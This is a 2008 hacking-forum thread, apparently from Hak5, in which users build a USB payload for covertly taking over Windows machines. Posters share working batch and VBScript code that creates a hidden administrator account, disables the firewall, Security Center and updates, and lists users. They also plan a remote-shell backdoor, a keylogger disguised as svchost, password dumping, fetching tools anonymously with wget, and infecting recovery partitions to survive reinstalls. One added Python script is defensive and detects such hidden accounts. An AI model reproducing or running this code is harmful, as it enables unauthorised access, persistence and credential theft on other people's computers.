DingleBerries (author), posted November 18, 2008

So I've been contemplating making a new payload for a while... These are some of the things that I want to implement:

1. No .VBS or .NET
2. Mostly command line, and the .BATs will all be .EXEs, just because I like those better
3. Dump SAM or create a new admin, via command line, preferably both
4. Install a remote shell, this part is already taken care of
5. Dump a list of all users on the computer

And that's about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible, so there isn't any slurping of docs and whatnot, maybe pics ;). The dumping part will be done via command line, i.e. run rs.exe, because the shell copies itself once it's run. Other than that I have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know.

This is the code that will be used for the admin account.

Invisible User: Tiny

```batch
@echo off
:: Create the account and add it to the local Administrators group
net user Tiny password /add && net localgroup administrators Tiny /add
:: Build a .reg file that sets the account's UserList value to 0 (hidden from the welcome screen)
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "Tiny"=dword:00000000>> c:\hide.reg
:: Import it silently, then delete the file
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
:: Hide the profile folder (it only exists after the account's first logon)
attrib +r +a +s +h %SystemDrive%\docume~1\Tiny
Exit
```

Also I am thinking of just dumping the .reg of HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ because it contains all the users; that way we can limit 3rd party software. Like so:

```batch
REGEDIT /E EDIT_PATH_OF_DRIVE\FILE.REG "HKEY_LOCAL\----"
```

Disable Windows Firewall:

```batch
@echo off
:: Stop Security Center and the Windows Firewall/ICS service
net stop "Security Center"
net stop SharedAccess
:: Set the start type of the firewall (SharedAccess), Automatic Updates (wuauserv)
:: and Security Center (wscsvc) services to 4 = Disabled
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
```
X3N, posted November 18, 2008

> (quoting DingleBerries' post of November 18 above)

I've been thinking of trying to write it in python... and also maybe reworking the tools of the payload to be just scripts, then the entire thing can be made an exe.
DingleBerries (author), posted November 18, 2008

That's awesome.. It's late and I've got some papers to finish, but first chance I get I will try to post more details.
DMilton, posted November 19, 2008

> (quoting DingleBerries' post of November 18 above)

For point 5 you can execute this code, it's in VBScript. Of course, it can be modified to show only the users and not the groups...

UsersGroups.vbs

```vbscript
'UsersGroups.vbs
'This script enumerates users, grouped for each local group in a computer
'It creates a new file called users.txt in the same directory from which it's executed.
'The code has been rebuilt from a similar app, but it works fine
'DMilton for free community
'Thread post at http://hak5.org/forums/index.php?showtopic=10746

'Variables explicit declaration
Option Explicit
Dim obj_UserName
Dim obj_GroupName
Dim obj_PC
Dim obj_Group
Dim obj_Shell
Dim str_PC
Dim str_Name
Dim objFSO
Dim objTextFile
Dim ExitFile
Const ForReading = 1, ForWriting = 2, ForAppending = 8

'Arguments
ExitFile = "users.txt"

'Exit file creation
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile(ExitFile, ForWriting, True)

'Local computer var creation ("." is the local machine in the WinNT provider)
str_PC = "."
Set obj_Shell = CreateObject("WScript.Shell")
str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")

'Creates an object obj_PC containing the actual local computer
Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer")
objTextFile.WriteLine("Computer name is: " & str_Name)

'Now we filter objects to obtain groups
obj_PC.Filter = Array("Group")

'Going through the objects and writing the txt
For Each obj_GroupName In obj_PC
    'Creating an object obj_Group containing the actual group
    Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group")
    'Writing the txt and formatting it
    objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name)
    'Filtering objects from the group to obtain users
    obj_Group.Members.Filter = Array("User")
    'Printing each user
    For Each obj_UserName In obj_Group.Members
        objTextFile.WriteLine("                  " & obj_UserName.Name)
    Next
Next

'Closing the file and cleaning the variables
objTextFile.Close
Set obj_UserName = Nothing
Set obj_GroupName = Nothing
Set obj_PC = Nothing
Set obj_Shell = Nothing
```

Moreover, I think that with the groups info in the final users.txt, adding a key in the registry for creating an admin account is simple, or not?

```batch
net user "USBAdmin" /add
:: the local group is "administrators" (plural) on English installs
net localgroup administrators "USBAdmin" /add
net user "USBAdmin" password
```

The problem with adding privileges is that this automation would work in English versions but not in other languages such as Spanish, where the Administrators group is named Administradores, but with the groups listed by the vbs you can easily extract the correct "Admin"-istrators or "Admin"-istradores word to add the correct privileges. Finally, it would be necessary to add "USBAdmin" to the Special Accounts User List, by adding a DWORD 0 for the created "USBAdmin", executed from a batch (or whatever else). In this case, from the command line it would be...

```batch
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0
```

:P
X3N, posted November 19, 2008

Part of my idea of writing the payload in python is that it would be cross-platform compatible... what I've been thinking of doing too is writing a bunch of scripts in python that would be included on a minimal distribution of Linux to do administrative tasks on a windows machine. All this could be included on a boot cd or boot usb drive... so the payload could be run on a machine on reboot... it would be far more complicated than the current switchblade... and would probably have a name like machete... so in the end the payload could be run from windows on insertion, or if you booted from the stick it would load linux text only and grab all the same info from windows... so if anyone likes this idea let me know... also, is there anyone that knows enough python to assist?
alexthedrifter, posted November 19, 2008

If you want my help msg me :D
DingleBerries (author), posted November 19, 2008

This will probably be an over-Thanksgiving-break kind of thing; finals are coming up and I would really like to keep my GPA in good standing. However, I hope to have a release by Black Friday.
Tcstool, posted November 20, 2008

Some awesome ideas there man. I'll be happy to chip in too as soon as I get caught up.
DingleBerries (author), posted November 20, 2008

I edited the first post. If a bat expert could go through and point out anything they see, that would be great.
DMilton, posted November 20, 2008

I'm cleaning the code you posted, making it efficient on any installation language system, adding some others, and it will be posted as soon as I have it working right.
DingleBerries (author), posted November 20, 2008

> (quoting DMilton's post of November 20 above)

That's awesome, thank you very much. I am still reviewing what it is exactly that I want, i.e. whether to include the keylogger. There would not be a need for the logs to be sent off because you could transfer them via the remote shell. Another thing I was considering is the "guest trick", where when logged on via guest a batch script containing instructions to create an admin account is placed in the admin's startup folder. If that is modified to allow RDP then we can install the shell via RDP when the owner is away from their desk.. Just throwing things out there :).
X3N, posted November 20, 2008

> (quoting DingleBerries' post of November 20 above)

I've been tweaking some of the AutoIt code for the remote switchblade. Using psexec.exe I was successfully running it on a remote computer; you still need domain admin rights and there's the issue of what user account the programs are run under... so I'm looking at other methods of information retrieval. But the payload executes fine and logs to the remote computer fine. The payload I was running just outputs the results to stdout, so basically: there's an exe, payload.exe, then there's a bat file I created to run the payload with

```batch
psexec.exe \\remotecomputer -u admin -p password payload.exe
```

Then open a command prompt and type

```batch
payload.bat > output.log
```

This can and will all be scripted correctly later, but for testing purposes it works fine. It would be easy enough to tailor this to set up a reverse backdoor etc... my only complaint is that we are still tied down to these NirSoft programs which are not open source. In the long run I'd like to get some of this password dumping code released as open source and rewritten in different languages. Also, the limitation of the NirSoft programs is that they only dump information of the currently logged on user.
DingleBerries (author), posted November 20, 2008

The back door is open source. It's from White Scorpion and will, hopefully, be custom once the final version of this is out.. I really just want something that's quick and painless. All the VNC stuff is a waste of time and is easily detected by smart admins. Once the computer is owned with the back door then we can start doing other things: transferring logs, installing other backdoors, etc.

So far these are the only programs that will be needed:

- White-Scorpion's Tiny back door - that is unless I find a better one
- Custom keylogger - C++, runs low on memory; I would like to either hide it from process manager or masquerade it as "svchost" or the like.
- Wget - so that other files can be snatched from a host and executed, no need to revisit the computer.

There are a few more things that I am looking at. I am coming close to the last weeks of class so studying and whatnot are my priorities atm. However, these are things I am considering:

- creddump
- Root Kits hidden in the microprocessor?
- PWDumpX v1.4
- Sysinternals Shit:
  - Ctrl2Cap v2.0 - Interested in this for maybe a new keylogger
  - PhysMem - Dumps RAM to hex
  - RegHide - Maybe useful in hiding the new admin account

Of course all of these can be hosted on some remote server, be sure that you do it anonymously as to not get caught, and just use wget. You would have to wait till late at night as to not alert the owner to any of your activities.

P.S. sorry I dumped all this here, I am just making sure I do not lose or forget anything.
X3N, posted November 20, 2008

http://code.google.com/p/creddump/

Here is some cool code I found, although it isn't really working for me right now... I think it's referencing some module I don't have.
DingleBerries (author), posted November 20, 2008

I was looking at where the LSA secrets are stored in the registry, and I know we can dump that.. Is it hard to decrypt the password? If not, then why is NirSoft needed?
X3N, posted November 20, 2008

Also I'm looking into rootkits for ideas... there's a lot of source code on that site; I think we could roll our own rootkit for this payload.
Tcstool, posted November 21, 2008

Some quick thoughts (I'm short on time so we can delve into specifics via PM if you want):

* We can stop Security Center, but instead of modifying the registry why not use the netsh commands to disable the firewall? Fewer fingerprints on the system and less likely to be caught by AV/antispyware. Even better, why not just punch a hole in the firewall with netsh for our listener?
* We can use the net user command to add the user to the system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!
* We can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host-based IDS type progs.
* Cain and Abel is pretty good at decrypting the LSA secrets.
DingleBerries (author), posted November 21, 2008

> (quoting Tcstool's post of November 21 above)

I like all of those; the only problem I see is Cain & Abel getting caught by virus scan. I really like punching a hole in the FW, I really didn't want to disable it completely. Also I am going to use your idea of the .dat file in the root directory, but instead I want to contaminate the recovery partition, that way even if they do reinstall the payload will remain there... I'm still working on this part. But what it will probably look for is a file specific to the recovery partition.
DMilton, posted November 21, 2008

> (quoting DingleBerries' post of November 20 above)

Meanwhile, while you decide what the payload should do, I've been playing with some of your first ideas. Executing it will extract the Administrators group name in a sure way for any installation language, or even if the user is experienced and has changed it, into a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how to extract the real Administrators group name from the command line, I did it in VBScript, ready to use.

By the way, here is the code for the VBScript:

```vbscript
'ListAdminGroup.vbs
Set objWshNetwork = CreateObject("WScript.Network")
Set objShell = CreateObject("WScript.Shell")
Set objEnv = objShell.Environment("PROCESS")
str_PC = objWshNetwork.ComputerName

'SID of the Administrators group (the same on every installation, whatever its language)
str_GroupSID = "S-1-5-32-544"
str_GroupName = GetGroupName(str_PC, str_GroupSID)
Set obj_Group = GetObject("WinNT://" & str_PC & "/" _
    & str_GroupName & ",group")

'Hand the group name to the batch through the process environment, which start.bat inherits
objEnv("AdminGroup") = str_GroupName
strPath = "start.bat"
objShell.Run strPath, 1, False

Function GetGroupName(sComputer, sGroupSID)
    Dim oGroupAccounts, oGroupAccount
    'Set for WinXP
    Set oGroupAccounts = GetObject( _
        "winmgmts://" & sComputer & "/root/cimv2") _
        .ExecQuery("Select Name from Win32_Group" _
        & " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'")
    'For Win2k we use the 'BUILTIN' domain
    If oGroupAccounts.Count = 0 Then
        Set oGroupAccounts = GetObject( _
            "winmgmts://" & sComputer & "/root/cimv2") _
            .ExecQuery("Select Name from Win32_Group" _
            & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'")
    End If
    For Each oGroupAccount In oGroupAccounts
        GetGroupName = oGroupAccount.Name
    Next
End Function
```

I think it will work in Windows XP and Windows 2000, but if you can play with it in other versions, that will be great. Once the script has finished, it launches the start.bat batch. It will create an administrator account whose name is defined in the %NewAdmin% variable, with a password given by the %password% variable, and add it into the Administrators group, using the variable %AdminGroup% given by the vbs. It creates the correct folder, hides it, and adds the new account name to the Special Accounts, to be invisible to the user. Here is the start.bat code. By the way, it must be in the same dir as the VbScript.

```batch
::start.bat
@echo off
set NewAdmin=USBAdmin
set password=YouWasHacked!
set Folder=%SystemDrive%\Documents and Settings\%NewAdmin%
:: the account has to exist before it can be added to a group
net user %NewAdmin% %password% /add
:: %AdminGroup% is the localized Administrators group name set by ListAdminGroup.vbs
net localgroup "%AdminGroup%" %NewAdmin% /add
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0
mkdir "%Folder%"
attrib +a +s +h "%Folder%"
```

It will also solve Tcstool's point about fewer fingerprints:

> We can use the net user command to add the user to the system/administrators group, then use the REG command to modify the keys as needed, as opposed to creating files on the machine. Fewer fingerprints!

About Tcstool's question:

> We can dump the users with the net users command instead of dumping the registry key. Again, trying to leave fewer fingerprints and engage in less suspicious activity likely to be caught by AV/host-based IDS type progs.

The code for Users.vbs can be:

```vbscript
'Users.vbs
Option Explicit
Dim obj_UserName
Dim obj_GroupName
Dim obj_PC
Dim obj_Group
Dim obj_Shell
Dim str_Computer
Dim str_Name
Dim objFSO
Dim objTextFile
Dim str_File
Const ForReading = 1, ForWriting = 2, ForAppending = 8

'Output file name can be given as the first argument, default users.txt
If WScript.Arguments.Count > 0 Then
    str_File = WScript.Arguments.Item(0)
Else
    str_File = "users.txt"
End If

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile(str_File, ForWriting, True)

str_Computer = "."
Set obj_Shell = CreateObject("WScript.Shell")
str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer")

'Walk every local group and write the name of each user member, one per line
obj_PC.Filter = Array("Group")
For Each obj_GroupName In obj_PC
    Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group")
    obj_Group.Members.Filter = Array("User")
    For Each obj_UserName In obj_Group.Members
        objTextFile.WriteLine(obj_UserName.Name)
    Next
Next
objTextFile.Close
```

It will extract all user names into a new users.txt file, for further use. And that's all for the moment!
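The hidden-account technique in the first post and in start.bat above leaves two artefacts that a defender can check for: a dword 0 under SpecialAccounts\UserList and membership in the local Administrators group. The following is an added example, not code from this thread; it is in Python so it runs offline over a REGEDIT /E export of the Winlogon key and saved `net localgroup Administrators` output rather than touching a live registry, and both sample inputs are constructed.

```python
import re

# Constructed sample of `REGEDIT /E` output for the Winlogon key, as it would look
# after the hide.reg / REG ADD from this thread had been applied (not from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DefaultUserName"="alice"
"Shell"="Explorer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"Tiny"=dword:00000000
"USBAdmin"=dword:00000000
"HelpAssistant"=dword:00000001
'''

# Constructed sample of `net localgroup Administrators` output.
SAMPLE_NET_LOCALGROUP = '''Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
alice
Tiny
USBAdmin
The command completed successfully.
'''

USERLIST_KEY = r"\winlogon\specialaccounts\userlist"
_DWORD_VALUE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<val>[0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Map each [key path] in a .reg export to its dword values: {path: {name: int}}.
    A real export file is UTF-16 with a BOM; open it with encoding="utf-16"."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        match = _DWORD_VALUE.match(line)
        if match and current is not None:
            keys[current][match.group("name")] = int(match.group("val"), 16)
    return keys


def hidden_accounts(reg_text):
    """Account names under SpecialAccounts\\UserList whose dword is 0 (hidden from the welcome screen)."""
    hidden = []
    for path, values in parse_reg_export(reg_text).items():
        if path.lower().endswith(USERLIST_KEY):
            hidden.extend(name for name, value in values.items() if value == 0)
    return sorted(hidden)


def parse_net_localgroup(text):
    """Member names from saved `net localgroup <group>` output (the block after the dashed rule)."""
    members, in_members = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True
            continue
        if line.startswith("The command completed"):
            break
        if in_members and line.strip():
            members.append(line.strip())
    return members


def hidden_admins(reg_text, localgroup_text):
    """Accounts that are both hidden and local administrators: the artefact this thread's scripts leave."""
    admins = {m.lower() for m in parse_net_localgroup(localgroup_text)}
    return [name for name in hidden_accounts(reg_text) if name.lower() in admins]


if __name__ == "__main__":
    for name in hidden_admins(SAMPLE_REG, SAMPLE_NET_LOCALGROUP):
        print("ALERT: hidden local administrator account:", name)
```

On a real host the same check can be fed the output of REGEDIT /E on the Winlogon key and of net localgroup Administrators, saved to files.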
DingleBerries (author), posted November 21, 2008

> (quoting the first paragraph of DMilton's post of November 21 above)

I have already compiled all the bats into an exe. I haven't slept since 6:30 this morning, class and whatnot, so I didn't have the mind power to do any more.. check out the small one I have HERE. The next release will actually have substance to it.
DMilton, posted November 21, 2008

I saw it, you have done fast work, but by the way, I hope the code I posted will be interesting for someone!
Tcstool, posted November 21, 2008

> (quoting DingleBerries' post of November 21 above)

I'm not saying we upload Cain & Abel to the local machine. You asked if it could be decrypted easily, and I was saying we could use it to work on our data back at our evil hacker lair after we've run the payload ;)

It will be hard to contaminate the recovery partitions because all the different PC vendors handle that partition differently. Maybe we should target Dells??? :-)